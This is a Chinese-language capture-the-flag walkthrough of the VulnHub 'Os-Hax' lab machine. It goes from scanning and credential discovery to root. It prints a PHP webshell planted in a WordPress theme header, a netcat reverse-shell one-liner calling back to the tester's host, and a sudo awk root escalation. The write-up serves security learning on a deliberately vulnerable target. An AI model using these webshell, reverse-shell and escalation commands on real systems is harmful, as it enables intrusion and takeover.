天天看点

vulnhub靶机练习-Os-Hax,详细使用

Difficulty : Intermediate

Flag : boot-root

Learing : exploit | web application Security | Privilege Escalation

Contact .. https://www.linkedin.com/in/rahulgehlaut/

This works better in VirtualBox than VMware

下载地址

https://www.vulnhub.com/entry/hacknos-os-hax,389/

不知道如何进行安装的,可以查看我的第一篇文章,里面有详细的介绍。

首先看ip然后扫描这个ip段,看靶机的IP地址是多少

vulnhub靶机练习-Os-Hax,详细使用

 发现靶机ip,使用nmap进行扫描

vulnhub靶机练习-Os-Hax,详细使用

 使用firefox 192.168.0.9进行访问。

vulnhub靶机练习-Os-Hax,详细使用

 可以查看页面的源代码,看看有没有什么有用信息。

vulnhub靶机练习-Os-Hax,详细使用

 使用目录扫描器gobuster扫描,发现一个wordpress目录。命令:gobuster dir -u http://192.168.0.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

vulnhub靶机练习-Os-Hax,详细使用

 访问成功,发现有一些标签并没有进行加载。需要让css样式进行加载

vulnhub靶机练习-Os-Hax,详细使用

 做一个hosts,把IP加入到localhost

vulnhub靶机练习-Os-Hax,详细使用

访问成功,加载了样式。

vulnhub靶机练习-Os-Hax,详细使用

 发现这里有个用户,可以试着后台登录。

vulnhub靶机练习-Os-Hax,详细使用

找到后台,尝试弱密码登录,无法登录。

vulnhub靶机练习-Os-Hax,详细使用
vulnhub靶机练习-Os-Hax,详细使用

看一下忘记密码,能不能获得验证的邮箱或者地址。

vulnhub靶机练习-Os-Hax,详细使用

也无法获得邮箱和地址。

vulnhub靶机练习-Os-Hax,详细使用

到这一步,再回到刚才的目录扫描,看看其他的目录文件。发现有一个img试着访问。

vulnhub靶机练习-Os-Hax,详细使用

发现有一个图片是flag开头的,打开查看。

vulnhub靶机练习-Os-Hax,详细使用

先把图片保存下来。

vulnhub靶机练习-Os-Hax,详细使用

在本地使用工具查看里面的内容,发现一个好像passwd的密码,保存在文件夹中。

vulnhub靶机练习-Os-Hax,详细使用
vulnhub靶机练习-Os-Hax,详细使用
vulnhub靶机练习-Os-Hax,详细使用

在使用其他工具查看一下信息。exiftool没有安装,使用apt-get install exiftool进行安装。

vulnhub靶机练习-Os-Hax,详细使用
vulnhub靶机练习-Os-Hax,详细使用

发现make当中同样存在passwd。

vulnhub靶机练习-Os-Hax,详细使用

思考这个pass会是一个什么,重新使用账号进行登录,发现还是提示密码不对。

vulnhub靶机练习-Os-Hax,详细使用
vulnhub靶机练习-Os-Hax,详细使用

试试看会不会是目录文件,发现访问成功。有一个hostIP文件和一个flag文件。

vulnhub靶机练习-Os-Hax,详细使用

发现是一个加密文件,把加密文件用百度进行查找

vulnhub靶机练习-Os-Hax,详细使用

进行解密,获得账号密码,web:Hacker@4514 然后保存到文件夹中

vulnhub靶机练习-Os-Hax,详细使用
vulnhub靶机练习-Os-Hax,详细使用
vulnhub靶机练习-Os-Hax,详细使用

使用账号密码进行登录,成功登录到了后台。

vulnhub靶机练习-Os-Hax,详细使用

查看用户,发现我们是超级管理员,那就可以编写一个主题,拿webshell。

vulnhub靶机练习-Os-Hax,详细使用

来到主题编写header这个主题,加入一句话木马。

vulnhub靶机练习-Os-Hax,详细使用

更新一下,system($_REQUEST['knife']);

vulnhub靶机练习-Os-Hax,详细使用

更新之后,来到主页,输入http://localhost/wordpress/?knife=id,成功使用

vulnhub靶机练习-Os-Hax,详细使用

打开burp,放到reqeater,使用post传参,来使用反弹shell

vulnhub靶机练习-Os-Hax,详细使用

监听本地的9001端口。nc -lvnp 9001

vulnhub靶机练习-Os-Hax,详细使用

ctrl+u进行编码。使用反弹shell命令:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.8+9001+>/tmp/f

vulnhub靶机练习-Os-Hax,详细使用

反弹成功,做一个bashshell。

vulnhub靶机练习-Os-Hax,详细使用

命令:python -c 'import pty;pty.spawn("/bin/bash")'

vulnhub靶机练习-Os-Hax,详细使用

在文件当中,发现了一个config文件,进行查看,可以看见数据库账号和密码。

vulnhub靶机练习-Os-Hax,详细使用

命令:cat /etc/passwd 查看密码文件

vulnhub靶机练习-Os-Hax,详细使用

切换用户为web,之前获得的账号密码进行登录。

vulnhub靶机练习-Os-Hax,详细使用

查看当前用户的权限,awk是可以调用系统函数的。可以进行执行root的命令

vulnhub靶机练习-Os-Hax,详细使用

命令:sudo awk '{ system("/bin/bash")}' ,获得root权限。

vulnhub靶机练习-Os-Hax,详细使用

进入root目录,查看文件,获得flag。

vulnhub靶机练习-Os-Hax,详细使用

查看cat /etc/sudoers文件,发现web是nopasswd,可以使用awk。

vulnhub靶机练习-Os-Hax,详细使用

这个版本也存在一个提权漏洞,也是另一种方法。uname -a

vulnhub靶机练习-Os-Hax,详细使用

 总结:

1.当发现后台进行爆破无法成功时,需要想一想目录的问题,会不会提示信息是在目录当中。

2.发现一些编码格式时,可以百度进行查看解密。

3.基本上拿到webshell之后所思考的提权都是有很多种的,根据情况不同,需要有不同的方法。